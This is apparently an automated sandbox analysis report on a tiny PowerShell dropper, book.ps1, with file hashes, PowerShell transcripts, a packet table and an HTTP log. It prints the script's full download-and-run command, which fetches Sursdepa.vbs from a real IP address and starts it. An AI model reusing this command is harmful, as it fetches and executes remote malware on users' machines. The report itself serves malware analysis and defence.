                  Entropy (8bit):4.512575626068564
                  Encrypted:false
                  SSDEEP:3072:GlDrUO7/A9bLSzUFA7UqMAZ5uNIIhOD2Xq6s2mFgM:EHo9i434Z5uCIhLXC2pM
                  MD5:A382F9565D886D24DD48272EA634D7F4
                  SHA1:EC69AE77CB27ED66A7E30A60CFE08066A02331AD
                  SHA-256:A46BAD45E29490A9CCA35D894E5D0CA5FB3D78E4A6084B2E403307C73B3845DF
                  SHA-512:6BC1D779A8EAED0496C593E785FA366EC1E82269A95431E08B606E1C699AF21DB1038CAABF74C946D2EF61A5C82A6C5FE787AE1D92E0DD0D62E3228AB2E6B520
                  Malicious:false
                  Preview:'elaeocar Fredni8 kildeteks SEKSEREN trknings Blomsterga Drummers5 Ramhe Tvungen Vermicleno RYGSTDINDI Kontere Abortede KRET agtetsed Midtve8 Suprac Incrus Balneaeu6 Systemrela4 NATIONER denegat Interplay Intergen dandyisms FERR ..'TVILLIN Overm7 Kvarkssubs6 UNDERFR nielle Tabacinge5 Timevistsa4 APSI Chrisro8 lappishcdg unmatchab frstefdsel BEVGELSE relicary Predenia7 Ansgning stiksa Solf BLOKFUNKTI Katarakt3 siderefe ..'sch.uble Syges6 dibbuksil Bloms HORSE teleopp Ombuddets Centr5 Boulevardt Bipinnat8 AFBLS reinduce overelab Kogeg5 cantionarb Immundic3 abbed MONETIZ branc Semimedic WAGINGR ..'Pantheism1 Efterb8 Critic Tallseun3 Inflows2 disse Tegneblok3 Goodhear Raaolierne ..'Egetforb torsk kruma Soningersw3 Theo4 FREMRYKNIN Inferreri unpred INDESNEEN equival OVERDELIC indf videokamer Energimn1 Dogf Kaste ..'Quiltskra Quabirdop Udraa7 svarbreve Hicksit ochersepis Unlabial Cliq Vendinge1 Oversigsta5 BONFIL Sumpf1 Ufor4 Gravemaski Hyperperfe1 catego Discipl2 FALS Twinjetcal2 ELORGLERSA

                  C:\Users\user\Documents\20220510\PowerShell_transcript.226546.4nuvXr5_.20220510184435.txt

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1053
                  Entropy (8bit):5.161870865373194
                  Encrypted:false
                  SSDEEP:24:BxSA07vBZ/x2DOXUWFUZ5tWBHjeTKKjX4CIym1ZJXoUZ5yWnxSAZ1S:BZyvj/oOlyeBqDYB1Z+y5ZZM
                  MD5:7F2A93EB2B61A67CC7CC03A6BB71FE42
                  SHA1:F74065C94AD1CF50DD3980DC0879CE4D20491791
                  SHA-256:EAC8007092FBC3524AA281BDBF9E6142E1A7E20194378A0231CE863A29F3BD72
                  SHA-512:62B2F00BA602AEE169FFC83E9D0F759384A561D1DC53AFD6CD7BBC7FFE299042080AB191E48A04326A6ECC3C0041359AA151160D4B76D76D64213F6751C445F5
                  Malicious:false
                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220510184438..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs..Process ID: 6344..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220510184438..**********************..PS>Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs..**********************..Command start time: 20220510184703..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript en

                  C:\Users\user\Documents\20220510\PowerShell_transcript.226546.z5QqKyyo.20220510184433.txt

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1021
                  Entropy (8bit):5.113387706445619
                  Encrypted:false
                  SSDEEP:24:BxSARy7vBZ/x2DOXUW6Y+PWcHjeTKKjX4CIym1ZJXYPnxSAZ+:BZ2vj/oORZcqDYB1ZS/ZZ+
                  MD5:89247E981DBC22B1D59AF404180B0D68
                  SHA1:C5799BA3D83B298F9911602B634B3F04ADA528C9
                  SHA-256:CE32257188627522CDDDDA21D621BCAD843A51656BFD19B5A8F0D0F6B227E354
                  SHA-512:8BE91E842E67AEC93766B1DA3353E6DD56FC67D87D4D33601F8170890E4CDDD61637C7D3AF88F21201213ED789A4305730F0AFC4D16B6A36CBC9C6F53A8F8A65
                  Malicious:false
                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220510184434..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noLogo -ExecutionPolicy unrestricted -file C:\Users\user\Desktop\book.ps1..Process ID: 3144..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220510184434..**********************..PS>CommandInvocation(book.ps1): "book.ps1"....**********************..Command start time: 20220510184954..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220510184954..***

                  Static File Info

                  General

                  File type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Entropy (8bit):4.908253738543961
                  TrID:
                  • Text - UTF-8 encoded (3003/1) 100.00%
                  File name:book.ps1
                  File size:108
                  MD5:10c1a6b6135d5f641ed56cfde0da1967
                  SHA1:dbf7d6327c2bf13f3ae772f6eaaa1c0a5fc5473e
                  SHA256:75de1e1b097579bf1a18c494042b16192a969dfb0fb9cdb3759d362b7b4b6a5f
                  SHA512:340fd3f2c364c852582c17d01742bad113e599aa32e1102e5837023b34d1838acdefeca1646ba8579cafb887bcf6715a4a578dd24828a4dfbdfb5efc07f866c1
                  SSDEEP:3:QK/JJFsLTzTH3x85MHVf3tFdkQPVAWBxWjsWrK3HsWn:pYzLh8uvtnZPiGQj2Xn
                  TLSH:EFB01216DF172E0D060D4C60F074B9E1A6817772B46C51EAE1B93005754F5436247838
                  File Content Preview:...powershell Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs..start Sursdepa.vbs

                  File Icon

                  Icon Hash:72f2d6fef6f6dae4

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  May 10, 2022 18:44:40.385945082 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.409142017 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.409244061 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.413928032 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.438344955 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.438370943 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.438388109 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.438405991 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.438491106 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.438560009 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.461571932 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461605072 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461627007 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461647987 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461663008 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.461669922 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461694002 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461694956 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.461715937 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461739063 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.461755991 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.461783886 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485105038 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485157013 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485196114 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485225916 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485255957 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485277891 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485301018 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485315084 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485352993 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485379934 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485388041 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485425949 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485466003 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485476017 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485502958 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485505104 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485543013 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485579967 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485599041 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485619068 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485656977 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485662937 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.485692978 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.485753059 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.508861065 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.508918047 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.508955002 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.508996010 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509036064 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509044886 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509074926 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509076118 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509116888 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509141922 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509167910 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509208918 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509221077 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509251118 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509293079 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509305000 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509334087 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509376049 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509383917 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509413958 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509459019 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509460926 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509502888 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509541035 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509557962 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509598017 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509639025 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509644985 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509677887 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509716988 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509721041 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509758949 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509798050 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509807110 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509836912 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509876966 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509886026 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509915113 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509954929 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.509958982 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.509994984 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.510036945 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.510042906 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.510078907 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.510118961 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.510121107 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.510159969 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.510200977 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533369064 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533415079 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533440113 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533466101 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533489943 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533514977 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533529043 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533540010 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533564091 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533588886 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533590078 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533598900 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533615112 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533628941 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533639908 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533664942 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533674002 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533690929 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533713102 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533715010 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533737898 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533765078 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533780098 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533791065 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533811092 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533834934 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533845901 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533859015 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533875942 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533883095 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533905029 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533906937 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533931971 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533953905 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.533966064 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.533979893 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534003019 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534025908 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534044981 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534049988 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534079075 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534101963 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534105062 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534113884 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534126043 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534143925 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534149885 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534173965 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534198046 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534199953 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534220934 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534241915 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534244061 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534267902 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534286976 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534291029 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534315109 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534336090 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534337044 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534360886 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534383059 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534384012 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534404993 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534427881 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534451008 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534451008 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534476042 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534486055 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534502029 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534518003 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.534524918 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.534616947 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.541693926 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.557698011 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557746887 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557776928 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557807922 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557835102 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557852983 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.557862043 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557888031 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.557889938 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557899952 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.557919979 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557946920 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557975054 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.557986975 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558001041 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558013916 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558029890 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558057070 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558073997 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558083057 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558110952 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558131933 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558137894 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558166981 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558177948 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558195114 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558222055 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558233976 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558249950 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558278084 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558290005 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558304071 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558331966 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558343887 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558357954 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558386087 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558396101 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558413982 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558440924 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558469057 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558473110 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558501959 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558516979 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.558528900 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558557034 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.558566093 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.564820051 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564861059 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564889908 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564918041 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564932108 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.564946890 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564960003 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.564977884 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.564997911 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565006971 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565036058 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565057039 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565062046 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565090895 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565107107 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565119028 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565145969 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565161943 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565175056 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565202951 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565218925 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565231085 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565270901 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565274954 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.565303087 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.565346956 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.569076061 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592300892 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592350006 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592385054 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592422009 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592434883 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592459917 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592494965 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592525959 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592566967 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592575073 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592605114 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592641115 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592645884 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592684031 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592719078 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592720985 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592757940 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592792988 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592793941 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592829943 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592866898 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592886925 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592905998 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592941999 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.592959881 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.592978954 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.593015909 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.593018055 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.593053102 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.593089104 CEST804972846.4.198.55192.168.2.4
                  May 10, 2022 18:44:40.593091011 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.685365915 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:40.699480057 CEST4972880192.168.2.446.4.198.55
                  May 10, 2022 18:44:42.507947922 CEST4972880192.168.2.446.4.198.55

                  HTTP Request Dependency Graph

                  • 46.4.198.55

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.44972846.4.198.5580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampkBytes transferredDirectionData
                  May 10, 2022 18:44:40.413928032 CEST218OUTGET /10P/Sursdepa.vbs HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                  Host: 46.4.198.55
                  Connection: Keep-Alive
                  May 10, 2022 18:44:40.438344955 CEST220INHTTP/1.1 200 OK
                  Date: Tue, 10 May 2022 16:44:39 GMT
                  Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28
                  Last-Modified: Tue, 10 May 2022 10:15:23 GMT
                  ETag: "39b46-5dea59a4f4c1a"
                  Accept-Ranges: bytes
                  Content-Length: 236358
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
